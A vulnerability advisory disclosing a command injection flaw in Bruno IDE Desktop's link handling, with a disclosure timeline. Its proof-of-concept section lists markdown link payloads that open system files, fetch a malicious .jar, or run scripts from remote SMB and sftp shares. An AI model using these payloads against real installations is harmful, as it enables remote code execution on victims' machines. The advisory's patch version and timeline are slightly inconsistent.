Bruno IDE Desktop Command Injection Vulnerability

Bruno IDE Desktop prior to 1.29.0

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents ]==================================================

Overview
Detailed Description
Timeline of Disclosure
Thanks & Acknowledgements
References

=====[ Vulnerability Information
]===========================================

Class: Improper Neutralization of Input During Web Page Generation
('Command Injection') [CWE-78]
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8

=====[ Overview ]===========================================================

System Affected: Bruno IDE Desktop
Software Version: All versions prior to 1.29.0
Impacts:
Vulnerability: A command injection vulnerability in the function
shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
attackers to execute arbitrary commands by supplying a crafted URL, leading
to potential remote code execution.

=====[ Detailed Description ]===============================================

Command Injection [PoC - Reproduction Steps]:

1. Launch Bruno IDE Desktop on any supported operating system.
2. Create a Collection and navigate to the Docs tab
3. Insert the following markdown payloads depending on the target OS:

Linux:

[passwd](/etc/passwd)

[smb](smb://localhost/public/x.desktop) - Malicious .desktop file

[sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file

POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw

Windows:

[Calc](C:/Windows/system32/calc.exe)

If Java is installed, directly execute a malicious .jar file:

[exploit](http://localhost/pwn.jar)

[exploit](C:/Users/user/Downloads/pwn.jar)

POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI

macOS:

[calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.

[calcFile](System/Applications/Calculator.app) - Another method to trigger
Calculator.

[exploit1](smb://10.211.55.6/public/hello.scptd) - Connects to a remote SMB
share and executes a script.

[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
Executes a script from a mounted volume.

[file](///etc/hosts) - Reads the system’s /etc/hosts file.

[facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
specific phone number.

[facetime2](facetime:[email protected]) - Triggers FaceTime using an
email address.

[tel](tel:+123456789) - Initiates a phone call via the tel: protocol.

[mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
protocol.

[calendar](calendar://) - Attempts to open a calendar application.

POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY

4. Upon execution, the crafted URL results in arbitrary command execution
in the victim's environment.

=====[ Timeline of Disclosure
]==============================================

14/Set/2024 - Responsible disclosure was initiated with the vendor.
16/Set/2024 - Vendor acknowledged the vulnerability.
20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
issue.
24/Out/2024 - CVE-2024-48463 was assigned and reserved.

=====[ Thanks & Acknowledgements ]==========================================

Tempest Security Intelligence [1]
Rodolfo Tavares - Vulnerability Discover
Filipe Xavier - Special Thanks
Henrique Arcoverde - Special Thanks

=====[ References ]=========================================================

[1] https://www.tempest.com.br
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463